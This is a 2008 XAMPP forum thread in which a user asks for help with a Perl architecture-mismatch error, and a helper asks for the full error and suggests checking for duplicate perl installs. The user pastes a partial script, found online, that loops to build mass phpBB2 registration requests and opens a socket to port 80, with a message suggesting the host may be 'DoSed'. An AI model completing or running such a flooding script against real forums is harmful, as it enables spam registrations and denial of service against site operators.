Perl question

Problems with the Windows version of XAMPP, questions, comments, and anything related.

Perl question

Postby farmdve » 16. May 2008 12:53

I want to execute a script but i get error
C:\xampp\htdocs\modperl>perl test.pl
Errno architecture (MSWin32-x86-multi-thread-4.0) does
itecture (MSWin32-x86-multi-thread-5.00) at c:/xampp/p
11.
Compilation failed in require at c:/xampp/perl/lib/IO/
BEGIN failed--compilation aborted at c:/xampp/perl/lib
Compilation failed in require at c:/xampp/perl/lib/IO/
BEGIN failed--compilation aborted at c:/xampp/perl/lib

Compilation failed in require at test.pl line 25.
BEGIN failed--compilation aborted at test.pl line 25.

Line 25 of test.pl is
Code: Select all
use IO::Socket;

Please help!
farmdve
 
Posts: 19
Joined: 27. November 2007 21:01

Postby farmdve » 16. May 2008 20:06

Sorry for so resent bump
farmdve
 
Posts: 19
Joined: 27. November 2007 21:01

Postby ifokkema » 19. May 2008 08:47

Parts of your error message is missing. Also, could you just like paste the first 30 lines of your code please?
ifokkema
 
Posts: 56
Joined: 08. May 2008 13:05
Location: Leiden, Netherlands

Postby farmdve » 19. May 2008 11:58

Ok this script i found on the net and i wanted to test if it works on localhost(where i installed phpbb2)

script is

Code: Select all
use IO::Socket;
$x = 0;
$host = localhost;
chop ($host);
$pth = phpbb2;
chop ($pth);
$type = 1;
chop ($type);
if($type == 1){
while($x != 9999)
{
$uname = "username=NsT__" . "$x";
$umail = "&email=NsT__" . "$x";
$postit =
"$uname"."$umail"."%40neosecurityteam.net&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit";

## Posit Length
$lrg = length $postit;

## Connect Socket with Variables Provided By User
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "
The Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!
" unless $sock;
farmdve
 
Posts: 19
Joined: 27. November 2007 21:01

Postby ifokkema » 19. May 2008 14:08

Thank you for the code, but I'm still missing the full error message. The message you included in your first post is only partly readable ;)
ifokkema
 
Posts: 56
Joined: 08. May 2008 13:05
Location: Leiden, Netherlands

Postby farmdve » 19. May 2008 17:03

I use the CMD to execute script however that is the error it shows me!
I opened socket.pm and the like but still
farmdve
 
Posts: 19
Joined: 27. November 2007 21:01

Postby ifokkema » 20. May 2008 08:38

farmdve wrote:I use the CMD to execute script however that is the error it shows me!

Could you post a screenshot or something? Because I can hardly believe that Windows would just remove parts of the error message:
Errno architecture (MSWin32-x86-multi-thread-4.0) does (... part missing ...) itecture (MSWin32-x86-multi-thread-5.00) at c:/xampp/p (... part missing ...) 11.

Either way, seems like some version mismatch between the libraries and the executable or something. Do you have perl installed separately outside of xampp, too?

How many results do you find when you search the hard drive for perl.exe?
ifokkema
 
Posts: 56
Joined: 08. May 2008 13:05
Location: Leiden, Netherlands

Postby farmdve » 20. May 2008 18:58

I will try to provide screenshot however now i must install another software for exec. perl scripts
farmdve
 
Posts: 19
Joined: 27. November 2007 21:01


Return to XAMPP for Windows

Who is online

Users browsing this forum: No registered users and 60 guests